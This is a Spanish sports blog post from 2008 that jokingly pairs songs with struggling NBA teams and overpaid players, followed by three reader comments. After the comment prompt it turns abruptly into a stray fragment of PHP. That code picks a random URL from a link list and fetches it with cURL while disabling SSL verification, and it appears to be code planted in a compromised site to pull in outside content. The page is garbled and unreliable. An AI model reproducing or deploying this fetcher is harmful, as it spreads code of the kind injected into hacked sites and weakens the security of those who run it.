Los hits TJNBA (III)

03 de January de 2008 por MagicJohnson32

Debido al gran éxito de crítica y público de nuestros Hits I y Hits II, regresamos con la tercera edición. Esta vez nos ponemos en plan cicuta y repartimos palos a jugadores y equipos, empezando por el peor de lo que llevamos de temporada 2007-2008:

“1 2 3 4” – Feist & Minnesota T’Wolves

En el improbable caso de que algún aficionado de los Timberwolves haya perdido la cuenta de los triunfos que suma su equipo a estas alturas, aquí llega Feist con la canción más buenrollista del 2007 para ponerle al día. Y, claro, mucho mejor que ver los partidos de los Wolves es disfrutar del precioso videoclip y, a continuación, de un homenaje a Garnett. Por los viejos tiempos, por los buenos recuerdos.

“Wolf Like Me” – TV On The Radio & Kevin McHale & Al Jefferson

¿Pensábais que íbamos a criticar a los Wolves sin darle su parte a Kevin McHale? Ni mucho menos; le hemos reservado una canción, este temazo de TV On The Radio, a ver si así, gritando lo de “we’re howling forever” se le pega algo del espíritu de los auténticos lobos y empieza a actuar en beneficio de una franquicia huérfana de líder. Y que le acompañe en los coros Al Jefferson, jugador sobre el que recae la responsabilidad de cubrir ese hueco, abismal, que dejó la marcha de Garnett.

“Over And Over” – Hot Chip & Houston Rockets

Una y otra vez, la historia de los Rockets lleva camino de repetirse esta temporada. Cuando no es la incompetencia de un entrenador o de algunos jugadores, son las lesiones de McGrady y/o Yao. La cuestión es que se marchó Van Gundy y llegó Adelman, se fue Juwan Howard y llegó Scola, se fue Mike James y llegó… Mike James, pero Houston está con balance negativo y no podrá contar con T-Mac durante unos cuantos partidos más. “The joy of repetition really is in you…”

“Easy Money” – Nick Cave And The Bad Seeds & Darius Miles, Stephon Marbury, Brian Cardinal, Raef LaFrentz, Kenyon Martin, Larry Hughes & Nené Hilario

¿Qué tienen en común Miles, Marbury, Cardinal, LaFrentz, Martin, Hughes y Nené? Que sus respectivos promedios de puntos esta temporada no alcanzan, extrapolados a millones de dólares, sus salarios. Marbury cobra 20 millones y anota 13,7 puntos, por no mencionar que se ha tomado unas vacaciones con su equipo inmerso en una crisis descomunal; Nené renovó por casi 9 millones, hizo el ridículo con Brasil, engordó como un muñeco inflable y anota 6,1 puntos; también en los Nuggets, Kenyon Martin aún disfruta las rentas de haber compartido equipo con Jason Kidd, gana más de 13 millones y está en 12 puntos por partido; Larry Hughes gana 12 millones al año y no alcanza los 10 puntos por partido, aunque claro, con un 33,5% de acierto en tiros es lo normal; Brian Cardinal, o el hombre que nos descubrió que Jerry West está muy mayor, gana casi 6 millones al año por no hacer nada, lo mismo que lleva haciendo Darius Miles las últimas temporadas por cerca de 9 millones. Y si los Blazers no tenían suficiente con Miles, el gran Raef LaFrentz les saca cerca de 12,5 millones a cambio de sus 2,3 puntos de media. Vaya un coro de atracadores para el gran Nick Cave…

*Buscaba un vídeo con los highlights de Brian Cardinal y, vaya por dios, no lo he encontrado, así que os dejo con esto.

Comenta

3 comentarios a esta entrada

  1. Jabho dice:
    #1

    La banda del cazo mix… y lo mejor es que menos Marbury y Cardinal el resto juegan la mitad de los partidos.

      Citar

  2. MagicJohnson32 dice:
    #2

    Y algunos no juegan ni un partido, caso de Miles. Sí, bastante escandaloso. Y he dejado a Bobby Simmons, porque mete 11 puntos y este año aún juega con cierta regularidad, pero se ha escapado por poco.

      Citar

  3. Dantley dice:
    #3

    Que gozada esta serie.

    En los del cazo mix, el que más me gusta es Cardinal, el resto más o menos en algún momento o han sido muy buenos (Marbury) o han tenido pinta de poder serlo, pero ¿Cardinal?

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>